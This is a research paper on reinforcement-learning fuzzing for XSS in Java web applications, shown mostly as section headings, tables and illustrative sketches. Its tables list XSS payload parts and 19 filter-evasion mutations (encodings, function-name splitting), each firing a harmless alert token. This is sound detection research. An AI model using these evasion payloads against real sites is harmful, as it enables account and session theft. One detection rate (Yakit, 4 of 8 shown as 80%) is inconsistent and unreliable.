Grey-Box Fuzzing Based on Reinforcement Learning for XSS Vulnerabilities
Abstract
1. Introduction
- (1) We use static analysis to identify the input points of Java web applications, covering Java code (Java Servlet and the Spring framework), configuration files, and HTML code. This covers almost all potential input points of the web application.
- (2) We propose an XSS payload generation method based on reinforcement learning. The state, action, and reward function of the reinforcement learning model are defined for the XSS vulnerability detection scenario. We validate payload generation with the DQN, DDQN, and Policy Gradient models.
- (3) To evaluate the effectiveness of the proposed method, we implement it and design systematic experiments. First, we compare the efficacy of different reinforcement learning models in XSS vulnerability detection. Second, we compare the performance of the proposed method with four state-of-the-art web scanners. Experimental results show that our method is more effective.
2. Related Work
2.1. XSS Vulnerability Detection
2.2. Reinforcement Learning for Cyber Security
3. Background
3.1. XSS Vulnerability
- Reflected XSS directly reflects the user’s input to the browser, causing the browser to execute some scripts. In this kind of attack, the attacker usually constructs the attack payload, combines the attack payload with the link to form a malicious link, and tricks the user into visiting the link. When the user visits the link, it causes the browser to execute malicious scripts.
- Stored XSS stores the input data on the server side, and it will trigger when the data are displayed on the page visited by the user. Usually, the attacker uploads the attack payload on the page where text can be submitted (such as message boards, blogs, etc.), and when other users access the data, the attack vector will be activated.
- DOM-based XSS exploits the Document Object Model (DOM), which allows scripts to dynamically access and update a document's content, structure, and styles and then display them on the page. This type of XSS does not require the payload to be saved on the server; instead, the client executes data obtained from the DOM locally. In the strict sense, it is also a form of reflected XSS.
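
To make the reflected case concrete, the following is a minimal sketch and not code from the paper. The function `render_greeting` and its parameters are hypothetical. It shows how echoing user input without escaping lets a payload reach the page as markup, and how HTML escaping turns the same payload into inert text.

```python
import html


def render_greeting(name: str, escape: bool) -> str:
    """Build an HTML fragment that reflects user input back to the page.

    Hypothetical handler used only for illustration.
    """
    shown = html.escape(name) if escape else name
    return f"<p>Hello, {shown}</p>"


payload = "<img src=x onerror=alert('webfuzzer-token')>"

# Without escaping, the payload is emitted as a real <img> element.
unsafe = render_greeting(payload, escape=False)

# With escaping, the angle brackets and quotes become HTML entities.
safe = render_greeting(payload, escape=True)
```
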
3.2. Reinforcement Learning
4. Methodology
4.1. Static Analysis
- Method Annotations: GetMapping, PostMapping, PutMapping, DeleteMapping, PatchMapping, RequestMapping, WebServlet.
- Parameter Annotations: RequestParam, PathVariable.
- Data Type: String, Byte, Double, Float, Long, Character, Short, Boolean.
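
As a rough illustration of how the annotations listed above can be located, the sketch below scans Java source text with regular expressions. This is an assumption made for brevity and is not the authors' analysis; a real implementation would more likely work on parsed code or bytecode. The names `find_input_points`, `ROUTE_RE`, and `PARAM_RE` are hypothetical.

```python
import re

METHOD_ANNOTATIONS = (
    "GetMapping", "PostMapping", "PutMapping", "DeleteMapping",
    "PatchMapping", "RequestMapping", "WebServlet",
)
PARAM_ANNOTATIONS = ("RequestParam", "PathVariable")

# Matches @GetMapping("/path") and @GetMapping(value = "/path").
ROUTE_RE = re.compile(
    r'@(%s)\s*\(\s*(?:\w+\s*=\s*)?"([^"]*)"' % "|".join(METHOD_ANNOTATIONS)
)
# Matches @RequestParam String q and @RequestParam("q") String query.
PARAM_RE = re.compile(
    r'@(%s)\s*(?:\(\s*(?:\w+\s*=\s*)?"([^"]*)"[^)]*\))?\s*(\w+)\s+(\w+)'
    % "|".join(PARAM_ANNOTATIONS)
)


def find_input_points(java_source):
    """Return (routes, params) found in a Java source string."""
    routes = [(m.group(1), m.group(2)) for m in ROUTE_RE.finditer(java_source)]
    params = [
        {
            "annotation": m.group(1),
            # Prefer the explicit request name, else the Java variable name.
            "name": m.group(2) or m.group(4),
            "type": m.group(3),
        }
        for m in PARAM_RE.finditer(java_source)
    ]
    return routes, params


SAMPLE = '''
@GetMapping("/search")
public String search(@RequestParam("q") String query, @PathVariable Long id) {
    return query;
}
'''
routes, params = find_input_points(SAMPLE)
```

The parameter type recovered here (for example `String` or `Long`) is what the data type list above would be matched against.
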
4.2. Payload Generation
4.2.1. Generation
4.2.2. Mutation
4.3. Reinforcement Learning Model
4.3.1. Model
4.3.2. State
4.3.3. Action
4.3.4. Reward
- (1) If an XSS vulnerability is found, the reward is +10 and the episode ends;
- (2) If no XSS vulnerability is found, the reward is -1 and the episode continues;
- (3) If a previously generated XSS payload is generated again, the reward is -5 and the episode continues;
- (4) When the 10th generation is reached, the episode ends and the environment returns to the initial state.
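
The four rules above can be sketched as a single reward function. This is an illustrative reading, not the authors' code: the name `step_reward` and its arguments are hypothetical, and the sketch assumes that the usual penalty still applies on the 10th generation, which the rules do not state explicitly.

```python
MAX_GENERATIONS = 10  # rule (4): the episode is cut off at the 10th generation


def step_reward(vulnerability_found, payload, seen_payloads, generation):
    """Return (reward, episode_done) for one generated payload.

    seen_payloads is a set of payloads already generated; it is updated in place.
    generation is the 1-based index of the current generation in the episode.
    """
    if vulnerability_found:
        return 10, True  # rule (1)
    # Rule (3) for a repeated payload, otherwise rule (2).
    reward = -5 if payload in seen_payloads else -1
    seen_payloads.add(payload)
    # Assumption: the penalty above is still returned when the cutoff is hit.
    done = generation >= MAX_GENERATIONS
    return reward, done
```
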
4.4. Observation
5. Evaluation
- RQ1. Effectiveness: Is the proposed method able to detect XSS vulnerabilities?
- RQ2. Comparison with other tools: Does the proposed method perform better than other tools? What is the reason?
- RQ3. Resource consumption: Does the proposed method consume excessive system resources?
5.1. Experimental Setup
5.2. Result and Analysis
5.2.1. Answering RQ1: Effectiveness
5.2.2. Answering RQ2: Comparison with Other Tools
5.2.3. Answering RQ3: Resource Consumption
6. Conclusions
Author Contributions
Funding
Institutional Review Board Statement
Informed Consent Statement
Data Availability Statement
Conflicts of Interest
No | Part | Dictionary |
---|---|---|
1 | HTML Tag | “a”, “area”, “audio”, “b”, “bgsound”, “body”, “br”, “button”, “form”, “frame”, “canvas”, “div”, “embed”, “frameset”, “h1”, “h2”, “h3”, “h4”, “h5”, “h6”, “iframe”, “img”, “input”, “link”, “menu”, “meta”, “object”, “ol”, “p”, “script”, “select”, “span”, “strong”, “style”, “table”, “tbody”, “td”, “textarea”, “tfoot”, “th”, “thead”, “title”, “tr”, “ul”, “video” |
2 | HTML Attribute | “src=x”, “href=x”, “href=“javascript:”, “src=“javascript:” |
3 | HTML Event | “onClick”, “onError”, “onLoad”, “onKeyDown”, “onKeyPress”, “onKeyUp”, “onContextMenu”, “onDoubleClick”, “onDrag”, “onDragEnd”, “onDragEnter”, “onDragExit”, “onDragLeave”, “onDragOver”, “onDragStart”, “onDrop”, “onMouseDown”, “onMouseEnter”, “onMouseLeave”, “onMouseMove”, “onMouseOut”, “onMouseOver”, “onMouseUp” |
4 | JS Snippet | “alert(‘webfuzzer-token’)”, “prompt(‘webfuzzer-token’)”, “confirm(‘webfuzzer-token’)”, “console.log(‘webfuzzer-token’)”, “alert(\”webfuzzer-token\”)”, “prompt(\”webfuzzer-token\”)”, “confirm(\”webfuzzer-token\”)”, “console.log(\”webfuzzer-token\”)” |
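
A minimal sketch of how one entry from each dictionary part might be combined into a payload is shown below. The template `<tag attribute event=snippet></tag>` and the name `generate_payload` are assumptions for illustration; only a few dictionary entries are included, and plain ASCII quotes are used in place of the typeset quotes in the table.

```python
import random

# Small subsets of the four dictionary parts listed in the table above.
TAGS = ["a", "body", "div", "img", "input"]
ATTRIBUTES = ["src=x", "href=x"]
EVENTS = ["onClick", "onError", "onLoad", "onMouseOver"]
SNIPPETS = ["alert('webfuzzer-token')", "prompt('webfuzzer-token')"]


def generate_payload(rng):
    """Pick one entry from each part and join them with an assumed template."""
    tag = rng.choice(TAGS)
    attribute = rng.choice(ATTRIBUTES)
    event = rng.choice(EVENTS)
    snippet = rng.choice(SNIPPETS)
    return f"<{tag} {attribute} {event}={snippet}></{tag}>"


payload = generate_payload(random.Random(0))
```

The fixed `webfuzzer-token` string gives the fuzzer a marker to look for when checking whether a payload executed.
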
No | Type | Description | Mutated Payload |
---|---|---|---|
1 | Angle Bracket Recoding | Use %3c and %3e instead of < and >. | %3Cfont onmousemove = alert(‘webfuzzer-token’)%3E%3C/font%3E |
2 | Random Case Conversion | Invert the case of the characters in the payload (no more than half the number of characters). | <fONt OnmOuSEmoVE = aLERt(‘WEbfuZzEr-tokEn’)></fONt> |
3 | Space Insertion | Randomly insert spaces in the payload. | <font onmousemove = alert(‘webfuzzer-token’)></font > |
4 | Keyword Redundancy | Duplicate part of keywords. | <f<font>ont onmousemove = alert(‘webfuzzer-token’)></font> |
5 | Coding Conversion (URL) | Encode the JS snippet in the payload in URL encoding. | <font onmousemove = eval(‘%61%6c%65%72%74%28%27%77%65%62%66%75%7a%7a%65%72%2d%74%6f%6b%65%6e%27%29’)></font> |
6 | Coding Conversion (Base64) | Encode the JS snippet in the payload in Base64. | <font onmousemove = eval(atob(‘YWxlcnQoJ3dlYmZ1enplci10b2tlbicp’))></font> |
7 | Coding Conversion (Hex) | Encode the JS snippet in the payload in hexadecimal. | <font onmousemove = Set.constructor`\x61\x6c\x65\x72\x74\x28\x27\x77\x65\x62\x66\x75\x7a\x7a\x65\x72\x2d\x74\x6f\x6b\x65\x6e\x27\x29```></font> |
8 | Coding Conversion (Unicode) | Encode the JS snippet in the payload in Unicode. | <font onmousemove = setTimeout`\u{61}\u{6c}\u{65}\u{72}\u{74}\u{28}\u{27}\u{77}\u{65}\u{62}\u{66}\u{75}\u{7a}\u{7a}\u{65}\u{72}\u{2d}\u{74}\u{6f}\u{6b}\u{65}\u{6e}\u{27}\u{29}`></font> |
9 | Coding Conversion (ASCII) | Encode the JS snippet in the payload as ASCII character codes. | <font onmousemove = eval(String.fromCharCode(97,108,101,114,116,40,39,119,101,98,102,117,122,122,101,114,45,116,111,107,101,110,39,41))></font> |
10 | JS Function Replacement (top) | Call the function through the top object to rewrite the payload. | <font onmousemove = top[‘ale’+’rt’](‘webfuzzer-token’)></font> |
11 | JS Function Replacement (eval) | Use the eval() function to rewrite the payload. | <font onmousemove = top.eval(‘a’+’lert’)(‘webfuzzer-token’)></font> |
12 | JS Function Replacement (self) | Call the function through the self object to rewrite the payload. | <font onmousemove = self[‘al’+’ert’](‘webfuzzer-token’)></font> |
13 | JS Function Replacement (this) | Call the function through the this object to rewrite the payload. | <font onmousemove = this[‘a’+’lert’](‘webfuzzer-token’)></font> |
14 | JS Function Replacement (toString) | Use the toString() function to rewrite the payload. | <font onmousemove = top [8680439..toString(30)](‘webfuzzer-token’)></font> |
15 | JS Function Replacement (custom function) | Use the custom function to rewrite the payload. In this example, we define the a() function. | <font onmousemove = a(this);function a(){}(alert(‘webfuzzer-token’))></font> |
16 | Backticks Insertion | Use backticks to diversify function calls. | <font onmousemove = javascript:`${alert(‘webfuzzer-token’)}`></font> |
17 | Regex | Insert special symbols in the payload and remove them using regular expressions. | <font onmousemove = eval(“~a~l~e~r~t~(~’~w~e~b~f~u~z~z~e~r~-~t~o~k~e~n~’~)~”.replace(/~/g, ‘‘))></font> |
18 | Quotes Change | Change single quotes to double quotes. | <font onmousemove = alert(“webfuzzer-token”)></font> |
19 | No Mutation | - | <font onmousemove = alert(‘webfuzzer-token’)></font> |
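
A few of the mutation types in the table above can be sketched as small string transformations. The function names are hypothetical and the sketch covers only types 1, 2, 6, 9, and 18; it uses plain ASCII quotes rather than the typeset quotes shown in the table.

```python
import base64
import random


def recode_angle_brackets(payload):
    """Type 1: replace < and > with their URL-encoded forms."""
    return payload.replace("<", "%3C").replace(">", "%3E")


def random_case(payload, rng):
    """Type 2: flip the case of at most half of the characters."""
    chars = list(payload)
    letters = [i for i, c in enumerate(chars) if c.isalpha()]
    limit = min(len(letters), len(chars) // 2)
    for i in rng.sample(letters, rng.randint(0, limit)):
        chars[i] = chars[i].swapcase()
    return "".join(chars)


def encode_base64(snippet):
    """Type 6: wrap the Base64-encoded JS snippet in eval(atob(...))."""
    encoded = base64.b64encode(snippet.encode("ascii")).decode("ascii")
    return f"eval(atob('{encoded}'))"


def encode_char_codes(snippet):
    """Type 9: rebuild the JS snippet from its character codes."""
    codes = ",".join(str(ord(c)) for c in snippet)
    return f"eval(String.fromCharCode({codes}))"


def change_quotes(payload):
    """Type 18: change single quotes to double quotes."""
    return payload.replace("'", '"')


snippet = "alert('webfuzzer-token')"
original = f"<font onmousemove = {snippet}></font>"
mutated = original.replace(snippet, encode_base64(snippet))
```

Each function maps a payload (or its JS snippet) to a new string, so a mutation can be treated as one discrete choice applied to the current payload.
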
| Symbol | Description | Value |
|---|---|---|
| | Learning rate | 0.01 |
| | Discount factor | 0.95 |
| | Probability of choosing an action at random | 0.1 |
| | Update interval (rounds) for the target network | 10 |
| BATCH_SIZE | Number of samples | 32 |
| REPLAY_SIZE | Experience pool size | 1000 |
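
To show where the discount factor and the random-action probability from the table enter the computation, the sketch below writes out epsilon-greedy action selection and the standard DQN and Double DQN learning targets in plain Python. These are the textbook formulations, not necessarily the authors' exact implementation, and the constant names `GAMMA` and `EPSILON` are hypothetical.

```python
import random

GAMMA = 0.95    # discount factor from the table
EPSILON = 0.1   # probability of choosing an action at random


def epsilon_greedy(q_values, rng, epsilon=EPSILON):
    """Pick a random action with probability epsilon, else the greedy one."""
    if rng.random() < epsilon:
        return rng.randrange(len(q_values))
    return max(range(len(q_values)), key=q_values.__getitem__)


def dqn_target(reward, next_q_target, done, gamma=GAMMA):
    """DQN: the target network both selects and evaluates the next action."""
    if done:
        return reward
    return reward + gamma * max(next_q_target)


def ddqn_target(reward, next_q_online, next_q_target, done, gamma=GAMMA):
    """Double DQN: the online network selects, the target network evaluates."""
    if done:
        return reward
    best = max(range(len(next_q_online)), key=next_q_online.__getitem__)
    return reward + gamma * next_q_target[best]
```

With a step reward of -1, target-network values `[1.0, 2.0]`, and online-network values `[5.0, 0.0]`, the DQN target is -1 + 0.95 × 2.0 and the Double DQN target is -1 + 0.95 × 1.0, because the online network prefers the first action.
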
Type | Injection Point | Non-Injection Point |
---|---|---|
Integer, Double, Float, Long, Short | random number + payload | random number |
Boolean | true or false (50% probability each) + payload | true or false (50% probability each) |
Byte | byte sequence of length 7 + payload | byte sequence of length 7 |
Character | letter or digit + payload | letter or digit |
Other | string from static analysis or random string of length 7 + payload | string from static analysis or random string of length 7 |
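
The table above can be read as a per-type value generator. The sketch below is one possible reading: `generate_value` and its arguments are hypothetical, and the numeric range (0 to 9999) and the hexadecimal rendering of the 7-byte sequence are assumptions that the table does not specify.

```python
import random
import string

NUMERIC_TYPES = ("Integer", "Double", "Float", "Long", "Short")


def random_string(rng, length=7):
    """Random lowercase string, used when static analysis gave no string."""
    return "".join(rng.choice(string.ascii_lowercase) for _ in range(length))


def generate_value(param_type, payload, rng, inject, static_string=None):
    """Build a request value for one parameter.

    inject=True marks the injection point, where the payload is appended.
    """
    if param_type in NUMERIC_TYPES:
        base = str(rng.randint(0, 9999))  # assumed range
    elif param_type == "Boolean":
        base = rng.choice(["true", "false"])
    elif param_type == "Byte":
        # Assumption: 7 random bytes rendered as hexadecimal text.
        base = "".join(f"{rng.randrange(256):02x}" for _ in range(7))
    elif param_type == "Character":
        base = rng.choice(string.ascii_letters + string.digits)
    else:
        base = static_string if static_string is not None else random_string(rng)
    return base + payload if inject else base
```
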

Web Application | RL Model | Vulnerability Count | Time | Detection Rate |
---|---|---|---|---|
WebGoat | random | 5 | - | 29.4% |
WebGoat | DQN | 15 | 2 h 46 m 20 s | 88.2% |
WebGoat | DDQN | 17 | 3 h 4 m 3 s | 100.0% |
WebGoat | Policy Gradient | 14 | 4 h 21 m 8 s | 82.4% |
Jeesns | random | 3 | - | 37.5% |
Jeesns | DQN | 5 | 4 h 31 m 14 s | 62.5% |
Jeesns | DDQN | 8 | 5 h 59 m 35 s | 100.0% |
Jeesns | Policy Gradient | 8 | 7 h 21 m 3 s | 100.0% |

No | Input Point | DQN Time (s) | DDQN Time (s) | Policy Gradient Time (s) |
---|---|---|---|---|
1 | /2022121558/400 | 2.8 | 23.4 | 41.9 |
2 | /1382523204/900 | 3.2 | 5.2 | 14.4 |
3 | /1406352188/900 | 6.1 | 7.4 | 29.6 |
4 | /1750680855/400 | 1.5 | 3.8 | 12.3 |
5 | /1572295549/1100 | 1.4 | 6.3 | 9.5 |
6 | /538385464/1100 | 2.7 | 3.0 | 14.5 |
7 | /980912706/1100 | 2.9 | 4.0 | 20 |
8 | /1036971378/1200 | 2.9 | 5.1 | 14.9 |
9 | /1786050421/1500 | 2.8 | 4.5 | 39.9 |
10 | /1319172155/1900 | 3.0 | 6.0 | 14.5 |
11 | /611366032/900/5 | 112.7 | 117.0 | 31.5 |
12 | /1584137874/1700 | 3.5 | 3.5 | 18.1 |
13 | /1001855130/900 | 24.9 | 17.4 | 7.5 |
14 | /693820813/900 | 34.8 | 17.8 | 20.4 |
15 | /478442269/900 | 32 | 37 | 16 |
16 | /1642011371/900 | 6.6 | 9.0 | 24.3 |
17 | /751836712/900 | 14.8 | 12.6 | 11.3 |

No | Input Point | DQN Time (s) | DDQN Time (s) | Policy Gradient Time (s) |
---|---|---|---|---|
1 | /article/add | 252.6 | 165.2 | 108.5 |
2 | /weibo/list | 16.1 | 145.7 | 34.7 |
3 | /question/ask | 8.0 | 57.3 | 2.3 |
4 | /article/detail/ | 22.2 | 146.4 | 32.2 |
5 | /group/post/ | 8.5 | 63.774 | 97.7 |
6 | /question/detail/ | 28.1 | 238.3 | 33.2 |
7 | /group/topic/ | 22.6 | 145.6 | 33.28 |
8 | /weibo/detail/ | 18.8 | 164.8 | 24.1 |

Web Application | Scanner | Vulnerability Count | Detection Rate |
---|---|---|---|
WebGoat | Burp Suite | 13 | 76.5% |
WebGoat | AWVS | 7 | 41.2% |
WebGoat | XSStrike | 5 | 29.4% |
WebGoat | Yakit | 6 | 35.3% |
Jeesns | Burp Suite | 3 | 37.5% |
Jeesns | AWVS | 8 | 100.0% |
Jeesns | XSStrike | 3 | 37.5% |
Jeesns | Yakit | 4 | 80.0% |
© 2023 by the authors. Licensee MDPI, Basel, Switzerland. This article is an open access article distributed under the terms and conditions of the Creative Commons Attribution (CC BY) license (https://creativecommons.org/licenses/by/4.0/).
Song, X.; Zhang, R.; Dong, Q.; Cui, B. Grey-Box Fuzzing Based on Reinforcement Learning for XSS Vulnerabilities. Appl. Sci. 2023, 13, 2482. https://doi.org/10.3390/app13042482